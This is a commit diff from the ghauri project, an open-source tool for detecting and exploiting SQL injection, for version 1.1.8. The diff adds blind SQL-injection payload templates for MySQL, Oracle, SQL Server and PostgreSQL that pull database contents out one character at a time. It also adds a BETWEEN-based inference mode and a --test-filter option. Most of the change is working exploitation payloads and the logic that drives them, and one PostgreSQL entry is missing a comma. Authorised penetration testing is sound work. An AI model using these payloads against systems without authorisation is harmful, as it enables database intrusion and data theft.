STRLCPY/ghauri

■ ■ ■ ■ ■ ■

README.md

1		-	[![GitHub release](https://img.shields.io/badge/release-v1.1.7-brightgreen?style=flat-square)](https://github.com/r0oth3x49/ghauri/releases/tag/1.1.7)
	1	+	[![GitHub release](https://img.shields.io/badge/release-v1.1.8-brightgreen?style=flat-square)](https://github.com/r0oth3x49/ghauri/releases/tag/1.1.8)
2	2		[![GitHub stars](https://img.shields.io/github/stars/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/stargazers)
3	3		[![GitHub forks](https://img.shields.io/github/forks/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/network)
4	4		[![GitHub issues](https://img.shields.io/github/issues/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/issues)
		skipped 160 lines

■ ■ ■ ■ ■ ■

ghauri/__init__.py

		skipped 23 lines
24	24
25	25		"""
26	26
27		-	__version__ = "1.1.7"
	27	+	__version__ = "1.1.8"
28	28		__author__ = "Nasir Khan (r0ot h3x49)"
29	29		__license__ = "MIT"
30	30		__copyright__ = "Copyright (c) 2016-2025 Nasir Khan (r0ot h3x49)"
		skipped 2 lines

■ ■ ■ ■ ■ ■

ghauri/common/config.py

		skipped 97 lines
98	98		self.rto_warning = False
99	99		self.fetch_using = None
100	100		self.rtom_warning = False
	101	+	self.test_filter = None
101	102
102	103		@property
103	104		def session_filepath(self):
		skipped 7 lines

■ ■ ■ ■ ■ ■

ghauri/common/payloads.py

		skipped 34 lines
35	35		"MySQL": [
36	36		"ORD(MID(LENGTH({query}),{position},1))={char}",
37	37		"ORD(MID(IFNULL(LENGTH({query}),0),{position},1))={char}",
	38	+	"ORD(MID(IFNULL(CAST(LENGTH({query}) AS NCHAR),0),{position},1))={char}",
38	39		],
39	40		"Oracle": [
40	41		"ASCII(SUBSTRC(LENGTH({query}),{position},1))={char}",
41	42		"ASCII(SUBSTRC(NVL(LENGTH({query}),0),{position},1))={char}",
	43	+	"ASCII(SUBSTRC(NVL(CAST(LENGTH({query}) AS VARCHAR(4000)),0),{position},1))={char}",
42	44		],
43	45		"Microsoft SQL Server": [
44	46		"UNICODE(SUBSTRING(LTRIM(STR(LEN({query}))),{position},1))={char}",
45	47		"UNICODE(SUBSTRING(LEN({query}),{position},1))={char}",
	48	+	"UNICODE(SUBSTRING(ISNULL(CAST(LEN({query}) AS NVARCHAR(4000)),0),{position},1))={char}",
46	49		],
47	50		"PostgreSQL": [
48		-	"ASCII(SUBSTRING(LENGTH({query}::text)::text FROM {position} FOR 1))={char}"
	51	+	"ASCII(SUBSTRING(LENGTH({query}::text)::text FROM {position} FOR 1))={char}",
	52	+	"ASCII(SUBSTRING(COALESCE(LENGTH({query})::text,CHR(48))::text FROM {position} FOR 1))={char}"
	53	+	"ASCII(SUBSTRING(COALESCE(CAST(LENGTH({query})::text AS VARCHAR(10000))::text,CHR(32))::text FROM {position} FOR 1))={char}",
49	54		],
50	55		}
51	56
52	57		DATA_EXTRACTION_PAYLOADS = {
53	58		"MySQL": {
54		-	"ASCII": "ORD(MID({query},{position},1))={char}",
55		-	"ASC": "ORD(MID(IFNULL({query},0x20),{position},1))={char}",
	59	+	"no-cast": "ORD(MID({query},{position},1))={char}",
	60	+	"isnull": "ORD(MID(IFNULL({query},0x20),{position},1))={char}",
	61	+	"cast": "ORD(MID(IFNULL(CAST({query} AS NCHAR),0x20),{position},1))={char}",
56	62		# "CHAR": "MID({query},{position},1)=CHAR({char})",
57	63		},
58	64		"Oracle": {
59		-	"ASCII": "ASCII(SUBSTRC({query},{position},1))={char}",
60		-	"ASC": "ASCII(SUBSTRC(NVL({query},CHR(32)),{position},1))={char}",
	65	+	"no-cast": "ASCII(SUBSTRC({query},{position},1))={char}",
	66	+	"isnull": "ASCII(SUBSTRC(NVL({query},CHR(32)),{position},1))={char}",
	67	+	"cast": "ASCII(SUBSTRC(NVL(CAST({query} AS NVARCHAR(4000)),CHR(32)),{position},1))={char}",
61	68		# "CHAR": "SUBSTR({query},{position},1)=CHR({char})",
62	69		},
63	70		"Microsoft SQL Server": {
64		-	"ASCII": "UNICODE(SUBSTRING({query},{position},1))={char}",
65		-	"ASC": "UNICODE(SUBSTRING(ISNULL({query},' '),{position},1))={char}",
	71	+	"no-cast": "UNICODE(SUBSTRING({query},{position},1))={char}",
	72	+	"isnull": "UNICODE(SUBSTRING(ISNULL({query},' '),{position},1))={char}",
	73	+	"cast": "UNICODE(SUBSTRING(ISNULL(CAST({query} AS NVARCHAR(4000)),' '),{position},1))={char}",
66	74		# "CHAR": "SUBSTRING({query},{position},1)=CHAR({char})",
67	75		},
68	76		"PostgreSQL": {
69		-	"ASCII": "ASCII(SUBSTRING({query}::text FROM {position} FOR 1))={char}",
70		-	"ASC": "ASCII(SUBSTRING((COALESCE({query}::text,CHR(32)))::text FROM {position} FOR 1))={char}",
	77	+	"no-cast": "ASCII(SUBSTRING({query}::text FROM {position} FOR 1))={char}",
	78	+	"isnull": "ASCII(SUBSTRING((COALESCE({query}::text,CHR(32)))::text FROM {position} FOR 1))={char}",
	79	+	"cast": "ASCII(SUBSTRING((COALESCE(CAST({query} AS VARCHAR(10000))::text,CHR(32)))::text FROM {position} FOR 1))={char}",
71	80		# "CHAR": "SUBSTRING({query}::text FROM {position} FOR 1)=CHR({char})",
72	81		},
73	82		}
		skipped 2002 lines

■ ■ ■ ■ ■ ■

ghauri/common/utils.py

		skipped 1894 lines
1895	1895		vector=vector,
1896	1896		)
1897	1897		_temp.append(_r)
	1898	+	# experimental..
	1899	+	if conf.test_filter:
	1900	+	_filtered_tests = []
	1901	+	for t in _temp:
	1902	+	title = t.title
	1903	+	mobj = re.search(r"(?is)(?:%s)" % (re.escape(conf.test_filter)), title)
	1904	+	if mobj:
	1905	+	_filtered_tests.append(t)
	1906	+	if _filtered_tests:
	1907	+	_temp = _filtered_tests
1898	1908		return _temp
1899	1909
1900	1910
		skipped 145 lines

■ ■ ■ ■ ■ ■

ghauri/core/extract.py

		skipped 486 lines
487	487		char=ord(identified_character),
488	488		)
489	489		if vector_type == "time_vector":
490		-	condition = replace_with(
491		-	string=condition, character="=", replace_with="!="
492		-	)
	490	+	if conf.fetch_using.lower() == "between":
	491	+	condition = replace_with(
	492	+	string=condition,
	493	+	character="=",
	494	+	replace_with=" NOT BETWEEN 0 AND ",
	495	+	)
	496	+	else:
	497	+	condition = replace_with(
	498	+	string=condition, character="=", replace_with="!="
	499	+	)
	500	+	if vector_type == "boolean_vector":
	501	+	if conf.fetch_using.lower() == "between":
	502	+	condition = replace_with(
	503	+	string=condition,
	504	+	character="=",
	505	+	replace_with=" BETWEEN 0 AND ",
	506	+	)
493	507		expression = vector.replace("[INFERENCE]", f"{condition}").replace(
494	508		"[SLEEPTIME]", f"{timesec}"
495	509		)
		skipped 2291 lines

■ ■ ■ ■ ■ ■

ghauri/ghauri.py

		skipped 87 lines
88	88		confirm_payloads=False,
89	89		safe_chars=None,
90	90		fetch_using=None,
	91	+	test_filter=None,
91	92		):
92	93		verbose_levels = {
93	94		1: logging.INFO,
		skipped 8 lines
102	103		conf.safe_chars = safe_chars
103	104		conf.timesec = timesec
104	105		conf.fetch_using = fetch_using
	106	+	conf.test_filter = test_filter
105	107		logger.start("starting")
106	108		if not force_ssl:
107	109		ssl._create_default_https_context = ssl._create_unverified_context
		skipped 718 lines

■ ■ ■ ■ ■ ■

ghauri/scripts/ghauri.py

		skipped 63 lines
64	64		action="store_true",
65	65		help="Flush session files for current target",
66	66		)
	67	+	general.add_argument(
	68	+	"--test-filter",
	69	+	dest="test_filter",
	70	+	type=str,
	71	+	help="Select test payloads by titles (experimental)",
	72	+	metavar="",
	73	+	)
67	74
68	75		target = parser.add_argument_group(
69	76		"Target",
		skipped 385 lines
455	462		confirm_payloads=args.confirm_payloads,
456	463		safe_chars=args.safe_chars,
457	464		fetch_using=args.fetch_using,
	465	+	test_filter=args.test_filter,
458	466		)
459	467		if resp.is_injected:
460	468		target = ghauri.Ghauri(
		skipped 71 lines

■ ■ ■ ■ ■ ■

setup.py

		skipped 4 lines
5	5
6	6		setup(
7	7		name="ghauri",
8		-	version="1.1.7",
	8	+	version="1.1.8",
9	9		description="An advanced SQL injection detection & exploitation tool.",
10	10		classifiers=["Programming Language :: Python3"],
11	11		author="Nasir Khan",
		skipped 28 lines

updated code quality, added further retrieval payloads, updated code of confirming the characters when --fetch-using=between is used, added new switch for performing tests based on title(s). bumped version 1.1.8